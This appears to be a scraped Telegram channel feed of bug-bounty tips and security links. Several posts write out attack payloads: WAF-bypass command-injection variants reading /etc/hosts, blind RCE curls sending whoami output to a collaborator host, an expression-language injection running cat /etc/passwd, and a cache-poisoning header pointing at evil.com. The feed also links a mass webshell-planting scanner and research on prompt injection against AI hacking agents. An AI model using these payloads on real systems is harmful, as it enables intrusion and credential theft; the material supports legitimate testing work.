ar
Feedback
Bug bounty Tips

Bug bounty Tips

الذهاب إلى القناة على Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

إظهار المزيد
5 784
المشتركون
+424 ساعات
+767 أيام
+40730 أيام
أرشيف المشاركات
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames,
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets. ✅https://github.com/ill-deed/CVE-2025-34085-Multi-target

Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? ❌ cat /etc/hosts ✅ tac /e\t\c/h\o\s\t\s ✅ tac${IFS}/e\t\c/h\o\s\t\s ✅ tac /e*c/h*st* ✅ tac /e{t,c}*/{o,h}*s*{s,t} ✅ tac /??c/??sts Let me know guy's you all wants more or not like that?

Hey Hunter’s, DarkShadow here back again! ☠️Blind Remote Code Execution🔥 ✅POC: [Preferred format] curl -X POST -d \"user=$(w
+1
Hey Hunter’s, DarkShadow here back again! ☠️Blind Remote Code Execution🔥 ✅POC: [Preferred format] curl -X POST -d \"user=$(whoami)\" http://BURP_LINK" Others format you might try: curl whoami.BURP_LINK curl $(whoami).BURP_LINK some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output. NOTICE: always check User-Agent Header in your burp collaborator responds, if here you got curl means RCE. Now you hit follow me for more: x.com/darkshadow2bd

Hey Hunter’s, DarkShadow here back again, dropping another easiest way to get critical bugs! If You Ever See Language Paramet
Hey Hunter’s, DarkShadow here back again, dropping another easiest way to get critical bugs! If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload. ✅POC Payload:
1. Change the Method GET to POST 2. Language={${system("cat+/etc/passwd")}}
If you guy’s are really enjoy to read then show your love. #bugbountytips #rce

Guys, I need ur review... I have created a ai to generate a vibe coding prompt.. And made it open sourced please do check and let me know the review.. https://github.com/Addy-shetty/Vibe-Prompting

CACHE POISONING QUICK WIN: Most apps validate X-Forwarded-Host as a single value. But try this: X-Forwarded-Host: http://legit.com, http://evil.com • CDN: Reads first → Allows ✅ • App: Reads last → Injects

Have one question... Do any here learning vibe coding...

New bug bounty resource 🚀 The Cache Poisoning Bible - Part 1: Advanced Fundamentals Everything I wish I knew when I started:
New bug bounty resource 🚀 The Cache Poisoning Bible - Part 1: Advanced Fundamentals Everything I wish I knew when I started: • Cache key architectures • CDN comparison guide • Advanced detection methods • Real-world patterns https://medium.com/@Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9

Penetration Testing .pdf1.51 MB

SSH Hardening & Offensive Mastery.pdf5.74 MB

#DevOps #Tech_book "Java Spring Bug Hunter's Secure Coding Playbook: Java Spring Security with SAST Arsenal from Semgrep to Claude", 2025. // Java Spring security in 2025 - a high-stakes game where a single misconfigured bean or an overlooked deserialization endpoint can become the gateway for sophisticated attackers...

#DFIR #AIOps #MLSecOps #RAG_Security AI Incident Response Framework, V1.0 https://github.com/cosai-oasis/ws2-defenders/blob/main/incident-response/AI%20Incident%20Response.md // This guides defenders on proactively minimizing the impact of AI system exploitation. It details how to maintain auditability, resiliency, and rapid recovery even when a system is compromised by advanced threat actors. Also explores the unique challenges of AI incident response, emphasizing the role of forensic investigation and the complications introduced by agentic architectures, while providing concrete steps to manage this new complexity

#tools #WLAN_Security "Crowdsourcing Bluetooth identity, to understand Bluetooth vulnerability", DistrictCon 2025. ]-> Repo ]-> BlueTooth Information Data Exchange ]-> Blue2thprinting Code // Disclaimer

#exploit "Exploiting the Impossible: A Deep Dive into A Vulnerability Apple Deems Unexploitable", NullCon Berlin 2025. ]-> https://jhftss.github.io/Exploiting-the-Impossible ]-> PoC // race condition in Apple core file-copy API (CVE-2024-54566, CVE-2025-43220)

#AppSec #WebApp_Security 1. Critical UXSS in Opera Browser https://medium.com/@renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555 // Leak open tab URLs (flag included) 2. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more https://blog.trailofbits.com/2025/09/03/subverting-code-integrity-checks-to-locally-backdoor-signal-1password-slack-and-more // deep dive into Electron CVE-2025-55305 3. RCE though vulnerability in Facebook Messenger for Windows https://www.vulnano.com/2025/09/remote-code-execution-though.html // Attacker: Pixel Fold, Android 14. Victim: Windows 11 Home 22H

#DevOps #MLSecOps #Whitepaper "DoD Artificial Intelligence Cybersecurity Risk Management Tailoring Guide", Ver.2, July 2025. // This guidance applies to any AI system used or operated by DoD Components and presents tailored guidance for system owners and authorizing officials to use when authorizing an AI system for operational use

#Space_Security #WLAN_Security "GPS Spoofing Attacks on Automated Frequency Coordination System in Wi-Fi 6E and Beyond", 2025. // ..we demonstrate that GPS-based location reporting, which Wi-Fi APs use, can be spoofed using inexpensive, off-the-shelf radio equipment. This enables attackers to manipulate AP behavior, gain unauthorized spectrum access, cause harmful interference, or disable APs entirely by spoofing them into foreign locations See also: ]-> GNSS-WASP: GNSS Wide Area SPoofing (.pdf)

#AIOps #MLSecOps "Cybersecurity AI: Hacking the AI Hackers via Prompt Injection", Aug. 2025. ]-> Prompt injection mitigation // We present PoC exploits against the Cybersecurity AI (CAI) framework and its CLI tool, and detail our mitigations against such attacks in a multi-layered defense implementation

Free Recon Course and Methodology For Bug Bounty Hunters https://www.youtube.com/watch?v=evyxNUzl-HA

https://github.com/DivyanshGoel259/Churn-Prediction Finally our first ANN project in which we trained a model for "Churn Pred
+1
https://github.com/DivyanshGoel259/Churn-Prediction Finally our first ANN project in which we trained a model for "Churn Prediction"